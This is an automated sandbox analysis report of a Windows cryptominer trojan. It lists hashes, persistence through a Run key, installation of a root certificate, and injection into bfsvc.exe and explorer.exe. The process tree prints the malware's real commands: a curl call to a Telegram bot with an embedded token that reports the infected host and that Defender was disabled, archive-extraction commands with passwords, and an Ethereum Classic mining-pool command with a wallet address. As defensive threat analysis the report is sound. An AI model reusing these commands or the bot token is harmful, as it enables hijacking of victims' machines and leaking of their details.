8303f7eae4b7cb8020a8c0c1a24ee427438fbbcb2803da6b0e3fd8aa43da6910

Analysis

max time kernel
158s
max time network
133s
platform
windows7_x64
resource
win7-en-20211104
submitted
06-12-2021 03:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe
Size

120KB
MD5

2db2f599b773f36a2ed6c8797e8882df
SHA1

be5f83ef476e83ed5f2a2e77b8046ff86035e0b0
SHA256

8303f7eae4b7cb8020a8c0c1a24ee427438fbbcb2803da6b0e3fd8aa43da6910
SHA512

2876db33ae2278316bad322edc0d49553109dc49d0010475508d19f2fe16d75115742baec319e7d3a8048605a64b78e8bfc8aa00433ada01a2c1cb5aba43d3d4

Score

8^/10

persistence upx

Malware Config

Signatures

Downloads MZ/PE file
Executes dropped EXE 5 IoCs

Processes:

7z.exe7z.exeRegHost.exe7z.exe7z.exe

pid process

1384 7z.exe
1876 7z.exe
1652 RegHost.exe
1336 7z.exe
1120 7z.exe

pid	process
1384	7z.exe
1876	7z.exe
1652	RegHost.exe
1336	7z.exe
1120	7z.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	upx
\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	upx
\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	upx
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	upx

Loads dropped DLL 8 IoCs

Processes:

cmd.exe7z.exe7z.exeexplorer.execmd.exe7z.exe7z.exe

pid process

1812 cmd.exe
1384 7z.exe
1876 7z.exe
1712 explorer.exe
1712 explorer.exe
1344 cmd.exe
1336 7z.exe
1120 7z.exe

pid	process
1812	cmd.exe
1384	7z.exe
1876	7z.exe
1712	explorer.exe
1712	explorer.exe
1344	cmd.exe
1336	7z.exe
1120	7z.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exeRegHost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe -FromAutoRun"	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe -FromAutoRun"	RegHost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs

Processes:

bfsvc.exeexplorer.exebfsvc.exe

pid process

1724 bfsvc.exe
1724 bfsvc.exe
1724 bfsvc.exe
1724 bfsvc.exe
1712 explorer.exe
1712 explorer.exe
684 bfsvc.exe

pid	process
1724	bfsvc.exe
1724	bfsvc.exe
1724	bfsvc.exe
1724	bfsvc.exe
1712	explorer.exe
1712	explorer.exe
684	bfsvc.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exeRegHost.exe

description	pid	process	target process
PID 320 set thread context of 1724	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	bfsvc.exe
PID 320 set thread context of 1712	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	explorer.exe
PID 1652 set thread context of 684	1652	RegHost.exe	bfsvc.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

explorer.exe

pid process

1712 explorer.exe
1712 explorer.exe
1712 explorer.exe
1712 explorer.exe
1712 explorer.exe

pid	process
1712	explorer.exe
1712	explorer.exe
1712	explorer.exe
1712	explorer.exe
1712	explorer.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

Processes:

7z.exe7z.exe7z.exe7z.exe

description	pid	process
Token: SeRestorePrivilege	1384	7z.exe
Token: 35	1384	7z.exe
Token: SeSecurityPrivilege	1384	7z.exe
Token: SeSecurityPrivilege	1384	7z.exe
Token: SeRestorePrivilege	1876	7z.exe
Token: 35	1876	7z.exe
Token: SeSecurityPrivilege	1876	7z.exe
Token: SeSecurityPrivilege	1876	7z.exe
Token: SeRestorePrivilege	1336	7z.exe
Token: 35	1336	7z.exe
Token: SeSecurityPrivilege	1336	7z.exe
Token: SeSecurityPrivilege	1336	7z.exe
Token: SeRestorePrivilege	1120	7z.exe
Token: 35	1120	7z.exe
Token: SeSecurityPrivilege	1120	7z.exe
Token: SeSecurityPrivilege	1120	7z.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.execmd.execmd.exeexplorer.exe

description	pid	process	target process
PID 320 wrote to memory of 560	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	cmd.exe
PID 320 wrote to memory of 560	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	cmd.exe
PID 320 wrote to memory of 560	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	cmd.exe
PID 320 wrote to memory of 1812	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	cmd.exe
PID 320 wrote to memory of 1812	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	cmd.exe
PID 320 wrote to memory of 1812	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	cmd.exe
PID 1812 wrote to memory of 1384	1812	cmd.exe	7z.exe
PID 1812 wrote to memory of 1384	1812	cmd.exe	7z.exe
PID 1812 wrote to memory of 1384	1812	cmd.exe	7z.exe
PID 320 wrote to memory of 1276	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	cmd.exe
PID 320 wrote to memory of 1276	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	cmd.exe
PID 320 wrote to memory of 1276	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	cmd.exe
PID 1276 wrote to memory of 1876	1276	cmd.exe	7z.exe
PID 1276 wrote to memory of 1876	1276	cmd.exe	7z.exe
PID 1276 wrote to memory of 1876	1276	cmd.exe	7z.exe
PID 320 wrote to memory of 1724	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	bfsvc.exe
PID 320 wrote to memory of 1724	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	bfsvc.exe
PID 320 wrote to memory of 1724	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	bfsvc.exe
PID 320 wrote to memory of 1724	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	bfsvc.exe
PID 320 wrote to memory of 1724	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	bfsvc.exe
PID 320 wrote to memory of 1724	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	bfsvc.exe
PID 320 wrote to memory of 1724	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	bfsvc.exe
PID 320 wrote to memory of 1724	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	bfsvc.exe
PID 320 wrote to memory of 1724	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	bfsvc.exe
PID 320 wrote to memory of 1724	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	bfsvc.exe
PID 320 wrote to memory of 1724	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	bfsvc.exe
PID 320 wrote to memory of 1724	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	bfsvc.exe
PID 320 wrote to memory of 1724	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	bfsvc.exe
PID 320 wrote to memory of 1724	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	bfsvc.exe
PID 320 wrote to memory of 1724	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	bfsvc.exe
PID 320 wrote to memory of 1724	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	bfsvc.exe
PID 320 wrote to memory of 1724	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	bfsvc.exe
PID 320 wrote to memory of 1724	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	bfsvc.exe
PID 320 wrote to memory of 1724	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	bfsvc.exe
PID 320 wrote to memory of 1724	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	bfsvc.exe
PID 320 wrote to memory of 1724	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	bfsvc.exe
PID 320 wrote to memory of 1724	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	bfsvc.exe
PID 320 wrote to memory of 1724	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	bfsvc.exe
PID 320 wrote to memory of 1724	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	bfsvc.exe
PID 320 wrote to memory of 1712	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	explorer.exe
PID 320 wrote to memory of 1712	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	explorer.exe
PID 320 wrote to memory of 1712	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	explorer.exe
PID 320 wrote to memory of 1712	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	explorer.exe
PID 320 wrote to memory of 1712	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	explorer.exe
PID 320 wrote to memory of 1712	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	explorer.exe
PID 320 wrote to memory of 1712	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	explorer.exe
PID 320 wrote to memory of 1712	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	explorer.exe
PID 320 wrote to memory of 1712	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	explorer.exe
PID 320 wrote to memory of 1712	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	explorer.exe
PID 320 wrote to memory of 1712	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	explorer.exe
PID 320 wrote to memory of 1712	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	explorer.exe
PID 320 wrote to memory of 1712	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	explorer.exe
PID 320 wrote to memory of 1712	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	explorer.exe
PID 320 wrote to memory of 1712	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	explorer.exe
PID 320 wrote to memory of 1712	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	explorer.exe
PID 320 wrote to memory of 1712	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	explorer.exe
PID 320 wrote to memory of 1712	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	explorer.exe
PID 320 wrote to memory of 1712	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	explorer.exe
PID 320 wrote to memory of 1712	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	explorer.exe
PID 320 wrote to memory of 1712	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	explorer.exe
PID 320 wrote to memory of 1712	320	SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe	explorer.exe
PID 1712 wrote to memory of 1652	1712	explorer.exe	RegHost.exe
PID 1712 wrote to memory of 1652	1712	explorer.exe	RegHost.exe
PID 1712 wrote to memory of 1652	1712	explorer.exe	RegHost.exe

C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe
"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.GenericKD.47566371.31888.25819.exe"
1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl "https://api.telegram.org/bot5015072605:AAF5XYxgx2-1EIccZ_yASWCdHhZ1OC67zr0/sendMessage?chat_id=1437261742&text=%F0%9F%90%B7%20%D0%A3%20%D0%B2%D0%B0%D1%81%20%D0%BD%D0%BE%D0%B2%D1%8B%D0%B9%20%D0%B2%D0%BE%D1%80%D0%BA%D0%B5%D1%80!%0A%D0%92%D0%B8%D0%B4%D0%B5%D0%BE%D0%BA%D0%B0%D1%80%D1%82%D0%B0%3A%20Standard VGA Graphics Adapter%0A(Windows%20Defender%20has%20been%20turned%20off)"
2⤵
PID:560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1812

C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
2⤵
- Suspicious use of WriteProcessMemory
PID:1276

C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1876

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool etc.2miners.com:1010 -wal 0xd245AB3eb63C6cC58f49164595688ACeC5B87F70 -coin etc -worker EasyMiner_Bot -clKernel 3
2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1724

C:\Windows\explorer.exe
C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool etc.2miners.com:1010 -wal 0xd245AB3eb63C6cC58f49164595688ACeC5B87F70 -coin etc -worker EasyMiner_Bot -clKernel 3
2⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1712

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:1652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
4⤵
- Loads dropped DLL
PID:1344

C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
4⤵
PID:1256

C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1120

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool etc.2miners.com:1010 -wal 0xd245AB3eb63C6cC58f49164595688ACeC5B87F70 -coin etc -worker EasyMiner_Bot -clKernel 3
4⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:684

C:\Windows\explorer.exe
C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool etc.2miners.com:1010 -wal 0xd245AB3eb63C6cC58f49164595688ACeC5B87F70 -coin etc -worker EasyMiner_Bot -clKernel 3
4⤵
PID:1620

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Install Root Certificate

T1130

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\12B578593FDE07EC53D020B1D5DEBF3B_5D74C2DB556F94499BCD6D74A36958A3
MD5
7191cb07394cb5a7d94d627d1d3bee17

SHA1
c79ebdd9c2c02c7cc3fa28117f2ca1f2389687b3

SHA256
d9a942627e83efe031ae997312550ddc6445e779d4088031f8380ad00f7c1da3

SHA512
68068141ee7c9a2c17f9b4089967b4565e08771a5d897c3d6311eb97639db6690ed649fc8c69e8137ce8f1f363dce112822c97924bda25469ed930dad34cb0a1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2A7611428D62805A3E4E5BC4103D82E4_D0FA13DADFB59BDF00C474952E166CC1
MD5
119bfbf39cb75dfe23bfceb01a3104b7

SHA1
1eaa278dbc6a1c8d9463757cea5082518f7f673f

SHA256
e88356405fe7e1150144aaa56474ad1f68e0fef3a76647cddfc143c859e2856c

SHA512
f992fba29466c59e060ee35feb638a69ef25c536c2271cdcad1fccbdb84161e3eb49a8d27c5d75fdcc290367271632062dc54f2108afa9bf711cde58eba26146

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB
MD5
15092557fcf7db9fd811a776f81700d0

SHA1
55c32f4742e63a31fe8f349aae4ec2c822c92f3e

SHA256
a312faa9d394569eae83c1d4a3554c29fa7c445e76304e7831144f3c5f98994e

SHA512
56743843501691f9fc54ce64707d4b53f755a13997dadfb2809bd423295ec5746df2f606266dd75de1b895b75a5cf211ebd86a15f90aa81149ee4a5725bfa23e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\12B578593FDE07EC53D020B1D5DEBF3B_5D74C2DB556F94499BCD6D74A36958A3
MD5
fd7405cf05e8a67b879aa1eefbc2398b

SHA1
025a7c7236a3cf18e9fd39177b704dd06d1bd16c

SHA256
30a7aa37325633fa6c3532bdebeac2e7d0f860ea9cf9a6d4bdf470052523a4da

SHA512
e00e973f5ea34e986fba3b98cb4572e8aa33bf4f91f7ea5c85e31a43ad766f47f56b6d4d40106e202bf9dd0fa239accc4ccdd002dc31cc0f0336b7839c6fc723

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2A7611428D62805A3E4E5BC4103D82E4_D0FA13DADFB59BDF00C474952E166CC1
MD5
d51b04975bc022e29832459398f4b5bc

SHA1
3b4e9b37f597ee42b69d04ae8703fa9332b21643

SHA256
dec8a9e4d737b69736081281b443a5e24bf616115d4650fe09255ddc540a2651

SHA512
